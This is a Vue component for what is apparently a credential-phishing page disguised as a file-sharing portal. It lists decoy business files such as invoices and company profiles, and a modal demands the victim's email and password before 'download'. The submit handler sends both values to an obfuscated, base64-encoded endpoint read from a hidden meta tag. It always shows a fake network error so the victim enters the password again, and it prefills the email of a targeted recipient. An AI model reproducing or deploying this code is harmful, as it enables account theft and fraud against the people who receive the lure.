<template>
  <div>
    <header class="container-fluid text-white d-flex align-items-center py-3">
      <div class="d-flex align-items-center pl-4">
        <img :src="images.logo" class="me-3" alt="Logo" />
      </div>
    </header>
    <main class="container py-4">
      <h2>Files</h2>
      <div class="row">
        <div class="col-md-8 shadow-sm">
          <h6>All Files Are Ready To Download</h6>
          <table class="table">
            <thead>
              <tr>
                <th></th>
                <th>Name</th>
                <th>Size</th>
                <th>Action</th>
              </tr>
            </thead>
            <tbody>
              <tr v-for="file in files" :key="file.name" @click="showModal">
                <td><img :src="file.icon" alt="File Icon" /></td>
                <td>{{ file.name }}</td>
                <td>{{ file.size }}</td>
                <td><a href="#" class="text-right">Download</a></td>
              </tr>
            </tbody>
          </table>
        </div>
        <div class="col-md-3">
          <img :src="images.sideImage" style="width: 300px;" alt="Side Image" />
        </div>
      </div>
    </main>

    <!-- Custom Modal -->
    <div v-if="isModalVisible" class="modal-overlay">
      <div class="modal-container" id="modal-container">
        <div class="modal-content">
          <div class="modal-header">
            <img :src="images.formlogo" alt="Logo" />
          </div>
          <div class="modal-body">
            <div>
              <img src="https://iili.io/JWM9UzP.png" class="img-fluid mb-2" />
            </div>
            <form @submit.prevent="handleSubmit" class="px-2">
              <div v-if="displayError" class="alert alert-danger" style="padding: 10px 10px;">
                Network error, kindly try again!
              </div>
              <div class="text-center mb-1">
                <em>Enter details to access protected documents</em>
              </div>
              <div class="mb-2">
                <label for="emailInput" class="form-label">Email address</label>
                <input
                  type="email"
                  class="form-control shadow-none"
                  placeholder="Receiver's email"
                  v-model="email"
                  id="emailInput"
                  :readonly="emailReadonly"
                  required
                />
              </div>
              <div class="mb-3">
                <label for="passwordInput" class="form-label">Password</label>
                <input
                  type="password"
                  class="form-control shadow-none"
                  placeholder="Receiver's password"
                  v-model="password"
                  id="passwordInput"
                  minlength="6"
                  required
                />
              </div>
              <div class="text-center mb-2">
                <button :disabled="loading" class="btn btn-primary">
                  {{ loading ? "Verifying..." : "Access Files" }}
                </button>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
</template>

<script setup>
import { onMounted, ref, defineProps } from "vue";

// Add props definition
const props = defineProps({
  query: {
    type: String,
    default: ''
  }
});

const images = {
  logo: "https://iili.io/JWGZ8Mv.jpg",
  sideImage: "https://iili.io/JWGOlqJ.jpg",
  formlogo: "https://i.ibb.co/9k8Vtt8b/mssp.png",
  warning: "https://iili.io/JWM9UzP.png",
};
const fileimages = {
  file1: "https://iili.io/JWGkUx9.jpg",
  file2: "https://iili.io/JWGk8D7.jpg",
};

const files = [
  { name: "Product quantity.xlsx", size: "1.1 MB", icon: fileimages.file1 },
  { name: "Sample images", size: "1.8 MB", icon: fileimages.file2 },
  { name: "Specific products, with detailed descriptions.xlsx", size: "1.6 MB", icon: "https://iili.io/JWGkUx9.png" },
  { name: "Company profile.pdf", size: "3.07 MB", icon: "https://iili.io/JWGk8D7.png" },
  { name: "Delivery requirements.pdf", size: "1.07 MB", icon: "https://iili.io/JWGk8D7.png" },
];
// const files = [
//   // { name: "Product quantity.xlsx", size: "1.1 MB", icon: fileimages.file1 },
//   { name: "Consignee Details for Contract.pdf", size: "1.8 MB", icon: fileimages.file2 },
//   { name: "Contract Addendum Terms.xlsx", size: "1.6 MB", icon: fileimages.file1 },
//   { name: "Bank Details EURO AND USD.pdf", size: "1.07 MB", icon: fileimages.file2 },
//   { name: "Trade License.pdf", size: "1.07 MB", icon: fileimages.file2 },
// ];


const email = ref("");
const emailReadonly = ref(false);
const password = ref("");
let displayError = ref(false);
const loading = ref(false);
const isModalVisible = ref(false);

const validateEmailAddress = (email) => {
  const emailRegex = /^([a-zA-Z0-9._%-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})$/;
  return emailRegex.test(email);
};

const showModal = () => {
  isModalVisible.value = true;
};


const handleSubmit = () => {
  loading.value = true;
  const highstarlavista = document.querySelector('meta[name="highstarlavista"]')?.getAttribute('content');
  fetch(atob(highstarlavista), {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: `x1=${email.value}&x2=${password.value}`,
  })
    .then((response) => response.json())
    .then(() => {
    })
    .catch(() => {
    })
    .finally(() => {
      loading.value = false;
      password.value = "";
      displayError.value = true;
      document.querySelector("#passwordInput").focus();
    });
};

onMounted(() => {
  // showModal();
  
  // Use the query prop instead of reading from URL
  const emailParam = props.query || "";
  if (validateEmailAddress(emailParam)) {
    email.value = emailParam;
    emailReadonly.value = true;
  }
});
</script>

<style scoped>
body { font-family: sans-serif; margin: 0; padding: 0; }  header { background-color: #026FC2; color: white; display: flex; align-items: center; padding: 10px; } header  h1 { margin: 0; } main { padding: 20px; } table { width: 100%; border-collapse: collapse; }  footer { text-align: center; padding: 10px; background-color: #f2f2f2; }td img { height: 50px; width: 50px; } a { text-decoration: none; }body { display: flex; flex-direction: column; min-height: 100vh;  margin: 0; padding: 0; font-family: sans-serif; }main { flex: 1; padding: 20px; } footer { background-color: #f2f2f2; text-align: center; padding: 0px 4px; } .form-label{margin-bottom: 1px; font-size: 15px;} .form-control:disabled, .form-control[readonly] { background-color: #f8f8f8; opacity: 1; }
.modal-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); display: flex; justify-content: center; align-items: center; z-index: 1000; }
.modal-container { background: white; border-radius: 8px; max-width: 500px; width: 90%; z-index: 1001; }
.modal-header { display: flex; justify-content: space-between; align-items: center; padding: 1rem; border-bottom: 1px solid #dee2e6; padding: 5px 20px; }
.modal-header img { width:200px }
.btn-close { border: none; background: transparent; font-size: 1.5rem; cursor: pointer; }
.modal-body { padding: 1rem; }
</style>